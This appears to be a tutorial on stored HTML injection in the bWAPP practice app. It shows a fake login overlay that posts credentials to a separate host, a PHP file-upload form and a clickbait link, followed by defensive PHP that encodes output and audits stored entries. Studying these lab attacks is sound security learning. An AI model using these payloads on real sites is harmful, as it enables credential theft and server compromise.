HTML Injection – Stored


Compared with the other types of HTML injection, the stored variant is quite interesting, because it makes it easy to trick other users. An attacker can create a duplicate login screen, or inject markup that tricks users into clicking on it. The injected HTML is stored in the database and retrieved later, as needed, whenever the page is displayed.


Log in to bWAPP, select the ‘HTML Injection – Stored‘ bug and click the ‘Hack‘ button. This is a blog: the data you submit is stored and can be seen by other users as well. To see how it behaves, first type some valid text in the text area field.


Now let’s create a fake login form to trick users and capture their credentials.
Here’s the example.
Code:

<div style="position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; 
background-color:white;">
Session Expired, Please Login:<br>
<form name="login" action="http://192.168.0.3/captureData.php/">
<table>
<tr><td>Username:</td><td><input type="text" name="user"/></td></tr>
<tr><td>Password:</td><td><input type="password" name="pass"/></td></tr>
</table>
<input type="submit" value="Login"/>
</form>
</div>


When a user enters their credentials, you can capture the data.
Another example, found via Google: you can upload malicious files by using a fake upload button. If there’s no WAF configured, then we will get access to the entire system.
Code1:

 <?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>


Code2:

 Hey..!<br /><a href="http://itsecgames.com" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Click here to win IPhone99</span></a>

You can inject any HTML code. You may even copy the entire page source of another website and paste it into this blog field. We’ve now covered all the HTML injections. Hope you enjoyed.
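The payloads above only work because the blog writes stored entries back into the page without encoding them. The following added example (not code from bWAPP or from the original post) renders an entry unsafely and with output encoding, and audits stored rows for markup; the function names and the sample rows are assumptions constructed for illustration.

```php
<?php
// Added example (not bWAPP code). Function names and rows are assumptions.

// Vulnerable pattern: the stored entry is written into the page as-is,
// so any tags it contains become live elements in the victim's browser.
function render_entry_unsafe(string $entry): string
{
    return "<td>" . $entry . "</td>";
}

// Hardened pattern: encode on output so the entry is displayed as text.
function render_entry_safe(string $entry): string
{
    return "<td>" . htmlspecialchars($entry, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</td>";
}

// Audit helper: list the element names found in a stored entry.
// A plain-text blog field should contain none.
function tags_in_entry(string $entry): array
{
    preg_match_all('/<\s*([a-z][a-z0-9]*)\b/i', $entry, $m);
    return array_values(array_unique(array_map('strtolower', $m[1])));
}

// Constructed sample rows standing in for the blog table; rows 2 and 3
// are shortened forms of the payloads shown on this page.
$rows = [
    1 => 'Nice post, thanks!',
    2 => '<div style="position: absolute; left: 0px; top: 0px;">Session Expired, Please Login:<br>'
       . '<form name="login" action="http://192.168.0.3/captureData.php/">'
       . '<input type="text" name="user"/><input type="password" name="pass"/></form></div>',
    3 => 'Hey..!<br /><a href="http://itsecgames.com" target="_blank">Click here to win IPhone99</a>',
];

foreach ($rows as $id => $entry) {
    $tags = tags_in_entry($entry);
    printf("row %d: %s\n", $id, $tags ? 'markup found: ' . implode(',', $tags) : 'plain text');

    // Compare what reaches the browser inside the <td> cell in each mode.
    $unsafeInner = substr(render_entry_unsafe($entry), 4, -5);
    $safeInner   = substr(render_entry_safe($entry), 4, -5);
    printf("  raw '<' in unsafe output: %s, in encoded output: %s\n",
        strpos($unsafeInner, '<') === false ? 'no' : 'yes',
        strpos($safeInner, '<') === false ? 'no' : 'yes');
}
```

Encoding at output time also neutralises entries that were stored before the fix, which is why the audit only reports rows rather than rewriting them.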


DISCLAIMER : THE INFORMATION PUBLISHED IN THIS ARTICLE IS FOR EDUCATIONAL PURPOSE ONLY. ANY MISUSE OF THIS INFORMATION WILL NOT BE THE RESPONSIBILITY OF THE AUTHOR OF THE WEBSITE. THIS IS JUST MY LEARNING EXPERIENCE AND EDUCATIONAL BLOG FOR PEOPLE WHO WOULD LEARN FROM MY EXPERIENCE